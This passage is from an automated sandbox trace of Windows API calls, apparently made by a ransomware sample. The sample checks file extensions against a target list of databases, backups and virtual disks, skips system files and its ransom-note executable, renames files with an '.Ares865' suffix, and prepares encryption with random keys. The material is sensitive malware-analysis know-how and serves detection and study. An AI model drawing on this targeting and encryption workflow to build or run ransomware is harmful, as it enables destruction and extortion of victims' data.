(lpString="nwdb") returned 4 [0058.616] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0058.616] lstrlenW (lpString="nyf") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0058.616] lstrlenW (lpString="odb") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.616] lstrlenW (lpString="odb") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.616] lstrlenW (lpString="oqy") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0058.616] lstrlenW (lpString="ora") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0058.616] lstrlenW (lpString="orx") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0058.616] lstrlenW (lpString="owc") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0058.616] lstrlenW (lpString="p96") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0058.616] lstrlenW (lpString="p97") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0058.616] lstrlenW (lpString="pan") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0058.616] lstrlenW (lpString="pdb") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0058.616] lstrlenW (lpString="pdm") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0058.616] lstrlenW (lpString="pnz") returned 3 [0058.616] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0058.616] lstrlenW (lpString="qry") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0058.617] lstrlenW (lpString="qvd") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0058.617] lstrlenW (lpString="rbf") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0058.617] lstrlenW (lpString="rctd") returned 4 [0058.617] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0058.617] lstrlenW (lpString="rod") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0058.617] lstrlenW (lpString="rodx") returned 4 [0058.617] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0058.617] lstrlenW (lpString="rpd") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0058.617] lstrlenW (lpString="rsd") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0058.617] lstrlenW (lpString="sas7bdat") returned 8 [0058.617] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0058.617] lstrlenW (lpString="sbf") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0058.617] lstrlenW (lpString="scx") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0058.617] lstrlenW (lpString="sdb") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0058.617] lstrlenW (lpString="sdc") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0058.617] lstrlenW (lpString="sdf") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0058.617] lstrlenW (lpString="sis") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0058.617] lstrlenW (lpString="spq") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0058.617] lstrlenW (lpString="te") returned 2 [0058.617] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0058.617] lstrlenW (lpString="teacher") returned 7 [0058.617] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0058.617] lstrlenW (lpString="tmd") returned 3 [0058.617] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0058.617] lstrlenW (lpString="tps") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0058.618] lstrlenW (lpString="trc") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.618] lstrlenW (lpString="trc") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.618] lstrlenW (lpString="trm") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0058.618] lstrlenW (lpString="udb") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0058.618] lstrlenW (lpString="udl") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0058.618] lstrlenW (lpString="usr") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0058.618] lstrlenW (lpString="v12") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0058.618] lstrlenW (lpString="vis") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0058.618] lstrlenW (lpString="vpd") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0058.618] lstrlenW (lpString="vvv") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0058.618] lstrlenW (lpString="wdb") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0058.618] lstrlenW (lpString="wmdb") returned 4 [0058.618] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0058.618] lstrlenW (lpString="wrk") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0058.618] lstrlenW (lpString="xdb") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0058.618] lstrlenW (lpString="xld") returned 3 [0058.618] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0058.618] lstrlenW (lpString="xmlff") returned 5 [0058.618] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0058.618] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.Ares865") returned 87 [0058.618] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0058.621] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.622] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=704) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0058.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.622] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0058.623] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.623] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.623] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5c0, lpName=0x0) returned 0x120 [0058.627] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5c0) returned 0x190000 [0058.629] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0058.629] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.629] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0058.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0058.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.630] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.630] CloseHandle (hObject=0x120) returned 1 [0058.630] CloseHandle (hObject=0x15c) returned 1 [0058.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0058.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.632] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aadace0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1ab4d101, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x54e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ease of Access.lnk", cAlternateFileName="EASEOF~1.LNK")) returned 1 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="aoldtz.exe") returned 1 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".") returned 1 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="..") returned 1 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="windows") returned -1 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="bootmgr") returned 1 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="temp") returned -1 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="pagefile.sys") returned -1 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="boot") returned 1 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="ids.txt") returned -1 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="ntuser.dat") returned -1 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="perflogs") returned -1 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="MSBuild") returned -1 [0058.632] lstrlenW (lpString="Ease of Access.lnk") returned 18 [0058.632] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini") returned 79 [0058.632] lstrcpyW (in: lpString1=0x2cce488, lpString2="Ease of Access.lnk" | out: lpString1="Ease of Access.lnk") returned="Ease of Access.lnk" [0058.632] lstrlenW (lpString="Ease of Access.lnk") returned 18 [0058.632] lstrlenW (lpString="Ares865") returned 7 [0058.632] lstrcmpiW (lpString1="ess.lnk", lpString2="Ares865") returned 1 [0058.632] lstrlenW (lpString=".dll") returned 4 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".dll") returned 1 [0058.632] lstrlenW (lpString=".lnk") returned 4 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".lnk") returned 1 [0058.632] lstrlenW (lpString=".ini") returned 4 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".ini") returned 1 [0058.632] lstrlenW (lpString=".sys") returned 4 [0058.632] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2=".sys") returned 1 [0058.633] lstrlenW (lpString="Ease of Access.lnk") returned 18 [0058.633] lstrlenW (lpString="bak") returned 3 [0058.633] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.633] lstrlenW (lpString="ba_") returned 3 [0058.633] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.633] lstrlenW (lpString="dbb") returned 3 [0058.633] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.633] lstrlenW (lpString="vmdk") returned 4 [0058.633] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.633] lstrlenW (lpString="rar") returned 3 [0058.633] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.633] lstrlenW (lpString="zip") returned 3 [0058.633] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.633] lstrlenW (lpString="tgz") returned 3 [0058.633] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.633] lstrlenW (lpString="vbox") returned 4 [0058.633] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.633] lstrlenW (lpString="vdi") returned 3 [0058.633] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.633] lstrlenW (lpString="vhd") returned 3 [0058.633] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.633] lstrlenW (lpString="vhdx") returned 4 [0058.633] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.633] lstrlenW (lpString="avhd") returned 4 [0058.633] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.633] lstrlenW (lpString="db") returned 2 [0058.633] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.633] lstrlenW (lpString="db2") returned 3 [0058.633] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.633] lstrlenW (lpString="db3") returned 3 [0058.633] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.633] lstrlenW (lpString="dbf") returned 3 [0058.633] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.633] lstrlenW (lpString="mdf") returned 3 [0058.633] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.633] lstrlenW (lpString="mdb") returned 3 [0058.633] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.633] lstrlenW (lpString="sql") returned 3 [0058.634] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.634] lstrlenW (lpString="sqlite") returned 6 [0058.634] lstrcmpiW (lpString1="ss.lnk", lpString2="sqlite") returned 1 [0058.634] lstrlenW (lpString="sqlite3") returned 7 [0058.634] lstrcmpiW (lpString1="ess.lnk", lpString2="sqlite3") returned -1 [0058.634] lstrlenW (lpString="sqlitedb") returned 8 [0058.634] lstrcmpiW (lpString1="cess.lnk", lpString2="sqlitedb") returned -1 [0058.634] lstrlenW (lpString="xml") returned 3 [0058.634] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.634] lstrlenW (lpString="$er") returned 3 [0058.634] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.634] lstrlenW (lpString="4dd") returned 3 [0058.634] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.634] lstrlenW (lpString="4dl") returned 3 [0058.634] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.634] lstrlenW (lpString="^^^") returned 3 [0058.634] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.634] lstrlenW (lpString="abs") returned 3 [0058.634] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.634] lstrlenW (lpString="abx") returned 3 [0058.634] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.634] lstrlenW (lpString="accdb") returned 5 [0058.634] lstrcmpiW (lpString1="s.lnk", lpString2="accdb") returned 1 [0058.634] lstrlenW (lpString="accdc") returned 5 [0058.634] lstrcmpiW (lpString1="s.lnk", lpString2="accdc") returned 1 [0058.634] lstrlenW (lpString="accde") returned 5 [0058.634] lstrcmpiW (lpString1="s.lnk", lpString2="accde") returned 1 [0058.634] lstrlenW (lpString="accdr") returned 5 [0058.635] lstrcmpiW (lpString1="s.lnk", lpString2="accdr") returned 1 [0058.635] lstrlenW (lpString="accdt") returned 5 [0058.635] lstrcmpiW (lpString1="s.lnk", lpString2="accdt") returned 1 [0058.635] lstrlenW (lpString="accdw") returned 5 [0058.635] lstrcmpiW (lpString1="s.lnk", lpString2="accdw") returned 1 [0058.635] lstrlenW (lpString="accft") returned 5 [0058.635] lstrcmpiW (lpString1="s.lnk", lpString2="accft") returned 1 [0058.635] lstrlenW (lpString="adb") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.635] lstrlenW (lpString="adb") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.635] lstrlenW (lpString="ade") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.635] lstrlenW (lpString="adf") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.635] lstrlenW (lpString="adn") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.635] lstrlenW (lpString="adp") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.635] lstrlenW (lpString="alf") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.635] lstrlenW (lpString="ask") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.635] lstrlenW (lpString="btr") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.635] lstrlenW (lpString="cat") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.635] lstrlenW (lpString="cdb") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.635] lstrlenW (lpString="ckp") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.635] lstrlenW (lpString="cma") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.635] lstrlenW (lpString="cpd") returned 3 [0058.635] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.635] lstrlenW (lpString="dacpac") returned 6 [0058.635] lstrcmpiW (lpString1="ss.lnk", lpString2="dacpac") returned 1 [0058.635] lstrlenW (lpString="dad") returned 3 [0058.636] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.636] lstrlenW (lpString="dadiagrams") returned 10 [0058.636] lstrcmpiW (lpString1="Access.lnk", lpString2="dadiagrams") returned -1 [0058.636] lstrlenW (lpString="daschema") returned 8 [0058.636] lstrcmpiW (lpString1="cess.lnk", lpString2="daschema") returned -1 [0058.636] lstrlenW (lpString="db-journal") returned 10 [0058.636] lstrcmpiW (lpString1="Access.lnk", lpString2="db-journal") returned -1 [0058.636] lstrlenW (lpString="db-shm") returned 6 [0058.636] lstrcmpiW (lpString1="ss.lnk", lpString2="db-shm") returned 1 [0058.636] lstrlenW (lpString="db-wal") returned 6 [0058.636] lstrcmpiW (lpString1="ss.lnk", lpString2="db-wal") returned 1 [0058.636] lstrlenW (lpString="dbc") returned 3 [0058.636] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.636] lstrlenW (lpString="dbs") returned 3 [0058.636] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.636] lstrlenW (lpString="dbt") returned 3 [0058.636] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.636] lstrlenW (lpString="dbv") returned 3 [0058.636] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.636] lstrlenW (lpString="dbx") returned 3 [0058.636] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.636] lstrlenW (lpString="dcb") returned 3 [0058.636] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.636] lstrlenW (lpString="dct") returned 3 [0058.636] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.636] lstrlenW (lpString="dcx") returned 3 [0058.636] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.636] lstrlenW (lpString="ddl") returned 3 [0058.636] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.636] lstrlenW (lpString="dlis") returned 4 [0058.636] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.636] lstrlenW (lpString="dp1") returned 3 [0058.636] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.636] lstrlenW (lpString="dqy") returned 3 [0058.636] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.636] lstrlenW (lpString="dsk") returned 3 [0058.636] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.637] lstrlenW (lpString="dsn") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.637] lstrlenW (lpString="dtsx") returned 4 [0058.637] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.637] lstrlenW (lpString="dxl") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.637] lstrlenW (lpString="eco") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.637] lstrlenW (lpString="ecx") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.637] lstrlenW (lpString="edb") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.637] lstrlenW (lpString="epim") returned 4 [0058.637] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.637] lstrlenW (lpString="fcd") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.637] lstrlenW (lpString="fdb") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.637] lstrlenW (lpString="fic") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.637] lstrlenW (lpString="flexolibrary") returned 12 [0058.637] lstrcmpiW (lpString1="f Access.lnk", lpString2="flexolibrary") returned -1 [0058.637] lstrlenW (lpString="fm5") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.637] lstrlenW (lpString="fmp") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.637] lstrlenW (lpString="fmp12") returned 5 [0058.637] lstrcmpiW (lpString1="s.lnk", lpString2="fmp12") returned 1 [0058.637] lstrlenW (lpString="fmpsl") returned 5 [0058.637] lstrcmpiW (lpString1="s.lnk", lpString2="fmpsl") returned 1 [0058.637] lstrlenW (lpString="fol") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.637] lstrlenW (lpString="fp3") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.637] lstrlenW (lpString="fp4") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.637] lstrlenW (lpString="fp5") returned 3 [0058.637] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.638] lstrlenW (lpString="fp7") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.638] lstrlenW (lpString="fpt") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.638] lstrlenW (lpString="frm") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.638] lstrlenW (lpString="gdb") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.638] lstrlenW (lpString="gdb") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.638] lstrlenW (lpString="grdb") returned 4 [0058.638] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.638] lstrlenW (lpString="gwi") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.638] lstrlenW (lpString="hdb") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.638] lstrlenW (lpString="his") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.638] lstrlenW (lpString="ib") returned 2 [0058.638] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.638] lstrlenW (lpString="idb") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.638] lstrlenW (lpString="ihx") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.638] lstrlenW (lpString="itdb") returned 4 [0058.638] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.638] lstrlenW (lpString="itw") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.638] lstrlenW (lpString="jet") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.638] lstrlenW (lpString="jtx") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.638] lstrlenW (lpString="kdb") returned 3 [0058.638] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.638] lstrlenW (lpString="kexi") returned 4 [0058.638] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.638] lstrlenW (lpString="kexic") returned 5 [0058.639] lstrcmpiW (lpString1="s.lnk", lpString2="kexic") returned 1 [0058.639] lstrlenW (lpString="kexis") returned 5 [0058.639] lstrcmpiW (lpString1="s.lnk", lpString2="kexis") returned 1 [0058.639] lstrlenW (lpString="lgc") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.639] lstrlenW (lpString="lwx") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.639] lstrlenW (lpString="maf") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.639] lstrlenW (lpString="maq") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.639] lstrlenW (lpString="mar") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.639] lstrlenW (lpString="marshal") returned 7 [0058.639] lstrcmpiW (lpString1="ess.lnk", lpString2="marshal") returned -1 [0058.639] lstrlenW (lpString="mas") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.639] lstrlenW (lpString="mav") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.639] lstrlenW (lpString="maw") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.639] lstrlenW (lpString="mdbhtml") returned 7 [0058.639] lstrcmpiW (lpString1="ess.lnk", lpString2="mdbhtml") returned -1 [0058.639] lstrlenW (lpString="mdn") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.639] lstrlenW (lpString="mdt") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.639] lstrlenW (lpString="mfd") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.639] lstrlenW (lpString="mpd") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.639] lstrlenW (lpString="mrg") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.639] lstrlenW (lpString="mud") returned 3 